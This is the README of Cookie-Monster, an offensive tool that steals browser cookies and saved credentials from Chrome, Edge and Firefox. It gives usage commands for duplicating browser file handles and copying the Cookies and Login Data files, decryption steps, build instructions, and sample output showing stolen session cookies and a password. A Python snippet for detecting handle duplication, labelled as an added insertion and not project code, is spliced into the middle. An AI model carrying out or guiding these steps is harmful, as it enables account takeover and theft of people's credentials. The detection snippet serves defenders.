Cookie-Monster - BOF to Steal Browser Cookies and Credentials


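Steal browser cookies for Edge, Chrome and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate where the logins.json and key4.db files are stored, and download them. A separate github repo is referenced for offline decryption.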
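Because the Chrome/Edge technique described above depends on duplicating a handle owned by the browser process, process-access telemetry is one place to detect it. The following is an added detection example, not code from the Cookie-Monster project: it assumes events shaped like Sysmon Event ID 10 (ProcessAccess) records, and the allowlist and sample events are constructed for illustration.

```python
import ntpath

PROCESS_DUP_HANDLE = 0x0040  # access right required to duplicate another process's handles
BROWSERS = {"chrome.exe", "msedge.exe"}
# Assumption: images expected to open browser processes in this environment.
# Name-only matching is spoofable; match full path and signer in production.
ALLOWED_SOURCES = {"chrome.exe", "msedge.exe", "msmpeng.exe"}


def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def is_suspicious(event):
    """True if a non-allowlisted image was granted PROCESS_DUP_HANDLE on a browser."""
    if event.get("EventID") != 10:  # Sysmon ProcessAccess
        return False
    if image_name(event["TargetImage"]) not in BROWSERS:
        return False
    if image_name(event["SourceImage"]) in ALLOWED_SOURCES:
        return False
    return bool(int(event["GrantedAccess"], 16) & PROCESS_DUP_HANDLE)


def hunt(events):
    """Return (source, target, access) for every suspicious event."""
    return [(e["SourceImage"], e["TargetImage"], e["GrantedAccess"])
            for e in events if is_suspicious(e)]


# Constructed sample events (not real telemetry).
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": CHROME, "TargetImage": CHROME, "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Tools\inventory.exe", "TargetImage": CHROME, "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\svc.exe", "TargetImage": EDGE, "GrantedAccess": "0x1440"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": CHROME, "GrantedAccess": "0x40"},
    {"EventID": 1, "Image": CHROME},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("ALERT non-browser process duplicating browser handles:", hit)
```

This covers only the Chrome/Edge handle-duplication path. The Firefox module locates logins.json and key4.db on disk, so that path needs file-access auditing on those two files instead.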


BOF Usage

    Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
    cookie-monster Example:
       cookie-monster --chrome
       cookie-monster --edge
       cookie-moster --firefox
       cookie-monster --chromeCookiePID 1337
       cookie-monster --chromeLoginDataPID 1337
       cookie-monster --edgeCookiePID 4444
       cookie-monster --edgeLoginDataPID 4444
    cookie-monster Options:
        --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
        --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
        --firefox, looks for profiles.ini and locates the key4.db and logins.json file
        --chromeCookiePID, if chrome PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
        --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
        --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
        --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

EXE Usage

    Cookie Monster Example:
      cookie-monster.exe --all
    Cookie Monster Options:
      -h, --help     Show this help message and exit
      --all          Run chrome, edge, and firefox methods
      --edge         Extract edge keys and download Cookies/Login Data file to PWD
      --chrome       Extract chrome keys and download Cookies/Login Data file to PWD
      --firefox      Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

    pip3 install -r requirements.txt

Base64 encode the webkit master key

    python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies file

    python .\decrypt.py "XHh..." --cookies ChromeCookie.db

    Results Example:
    -----------------------------------
    Host: .github.com
    Path: /
    Name: dotcom_user
    Cookie: KingOfTheNOPs
    Expires: Oct 28 2024 21:25:22

    Host: github.com
    Path: /
    Name: user_session
    Cookie: x123.....
    Expires: Nov 11 2023 21:25:22

Decrypt Chrome/Edge passwords file

    python .\decrypt.py "XHh..." --passwords ChromePasswords.db

    Results Example:
    -----------------------------------
    URL: https://test.com/
    Username: tester
    Password: McTesty

Decrypt Firefox cookies and stored credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make are installed on Linux prior to compiling.

    make

To compile the exe on Windows

    gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

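To Do

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI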



